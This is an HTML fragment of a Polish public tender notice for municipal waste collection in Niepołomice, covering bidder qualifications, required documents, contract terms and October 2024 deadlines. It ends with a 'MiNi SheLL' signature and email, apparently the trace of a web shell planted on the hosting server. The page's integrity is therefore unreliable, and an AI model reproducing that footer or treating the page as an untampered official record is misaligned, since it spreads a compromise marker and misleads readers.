mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność do występowania w obrocie gospodarczym<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów. Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże, że : <br/>a) Posiada aktualny wpis do rejestru działalności regulowanej prowadzonej przez Burmistrza Miasta i Gminy Niepołomice, zgodnie z przepisami art. 9b ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach <br/>b) Posiada wpis do (BDO) bazy danych o produktach i opakowaniach oraz o gospodarce odpadami, o którym mowa w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach, w zakresie transportu odpadów w zakresie niezbędnym do realizacji zamówienia, w szczególności co do wszystkich rodzajów (kodów) odpadów objętych przedmiotem zamówienia.<br/>c) Posiada zawartą umowę/umowy na przyjmowanie odebranych od właścicieli nieruchomości odpadów komunalnych z instalacją komunalną/instalacją odzysku i unieszkodliwiania odpadów zapewniających przetworzenie odpadów komunalnych zgodnie z hierarchią sposobów postępowania z odpadami i zasadą bliskości, o których mowa w ustawie z dnia 14 grudnia 2012 r. o odpadach t.j. Dz. U. z 2023 r. poz. 1587 w zakresie niezbędnym do realizacji zamówienia, w szczególności co do wszystkich rodzajów (kodów) odpadów objętych przedmiotem zamówienia. Wykonawca obowiązany jest do spełnienia ww. wymagań również przez cały okres realizacji zamówienia.<br/><br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonego aktualnego na dzień składania oferty oświadczenia wykonawcy składanego na podstawie art. art. 125 ust. 1 ustawy z dnia ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych na zasadzie spełnia/nie spełnia oraz w oparciu o złożone dokumenty.<br/>Zdolność techniczna lub zawodowa<br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. <br/>Zamawiający uzna warunek za spełniony poprzez wykazanie przez Wykonawcę, że:<br/>1) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie: wykonał/wykonuje, co najmniej 1 usługę odbioru odpadów o kodach:<br/>a)	Niesegregowane (zmieszane) odpady komunalne - odpady o kodzie 20 03 01,<br/>b)	Odpady ulegające biodegradacji - odpady o kodzie 20 02 01,<br/>c)	Odpady z czyszczania ulic i placów - odpady o kodzie 20 03 03 <br/>d)	Odpady wielkogabarytowe - odpady o kodzie 20 03 07<br/><br/>Warunek zostanie spełniony jeśli Wykonawca wykaże, że wykonał usługę w jednym lub kilku zamówieniach na łączną kwotę nie mniejszą niż 100 000 zł oraz przedstawi referencje lub inne dokumenty potwierdzające należyte wykonanie umowy.<br/>Jeśli Wykonawca, który bierze udział w postępowaniu realizował usługę we wskazanym zakresie dla Zamawiającego, nie będzie zobowiązany do potwierdzenia jej referencjami. <br/><br/>2) W trakcie wykonywania zamówienia będzie dysponował co najmniej po jednym pojeździe:<br/><br/>a)	przystosowanym do odbierania zmieszanych odpadów komunalnych oraz odpadów z targowiskz pojemników o pojemnościach 0,12 m3, 0,24 m3, 1,1m3, wyposażonymi w system monitoringu GPS umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdów, miejscach postojów, oraz miejscach wyładunku <br/>b) przystosowanym do transportu kontenera na odpady o kodach 20 02 01 i 20 03 03 o pojemności 8 m3 i 6 m3 wyposażonymi w system monitoringu GPS umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdów, miejscach postojów, oraz miejscach wyładunku.<br/>c)	przystosowanym do odbioru odpadów wielkogabarytowych o kodzie 20 03 07 wyposażonymi w system monitoringu GPS umożliwiający trwałe<br/>zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdów, miejscach postojów, oraz miejscach wyładunku <br/>d)	przystosowanym do odbioru selektywnie zbieranych odpadów.<br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonego aktualnego na dzień składania oferty oświadczenia wykonawcy składanego na podstawie art. art. 125 ust. 1 ustawy z dnia ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych na zasadzie spełnia/nie spełnia oraz w oparciu o złożone dokumenty. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zezwolenie lub wpis do rejestru działalności regulowanej potwierdzający spełnianie przez Wykonawcę warunków udziału w postępowaniu dotyczących wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>- Aktualny wpis do rejestru działalności regulowanej prowadzonej przez Burmistrza Miasta i Gminy Niepołomice, zgodnie z przepisami art. 9b ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach,<br/>- wpis do (BDO) bazy danych o produktach i opakowaniach oraz o gospodarce odpadami, o którym mowa w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r. o odpadach, w zakresie transportu odpadów w zakresie niezbędnym do realizacji zamówienia, w szczególności co do wszystkich rodzajów (kodów) odpadów objętych przedmiotem zamówienia.; Wykaz dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich trzech lat , a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji dostaw lub usług, wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy dostaw lub usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.; Wykaz pojazdów dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.; Oświadczenie o zawartej umowie na przyjmowanie odebranych od właścicieli nieruchomości odpadów komunalnych z instalacją komunalną/instalacją odzysku i unieszkodliwiania odpadów zapewniających przetworzenie odpadów komunalnych zgodnie z hierarchią sposobów postępowania z odpadami i zasadą bliskości, o których mowa w ustawie z dnia 14 grudnia 2012 r. o odpadach t.j. Dz. U. z 2023 r. poz. 1587 w zakresie niezbędnym do realizacji zamówienia;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.; Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, składane na podstawie art. 117 ust. 4 ustawy Pzp w zakresie wykazu dostaw, usług lub robót budowlanych, które wykonają wykonawcy wspólnie ubiegający się o udzielenie zamówienia.; Oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby.; Treść pełnomocnictwa musi spełniać wymogi formalno – prawne określone w Kodeksie Cywilnym. Pełnomocnictwo można przedstawić w oryginale lub kopii poświadczonej przez notariusza. Pełnomocnictwo opatruje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, w przypadku postępowań l o wartości mniejszej niż progi unijne.; Oświadczenie o zatrudnianiu osób na podstawie umowy o pracę; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie postępowania udzielenie zamówienia publicznego, którego dotyczy, wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia oraz ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału”, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany i uzupełnienia treści umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności. Zamawiający poza możliwością zmiany na podstawie art. 455 ustawy Pzp, przewiduje również możliwość dokonania zmiany postanowień umowy w przypadkach określonych w projekcie umowy stanowiącym załącznik nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Drogą elektroniczną za pośrednictwem: https://e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-22 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com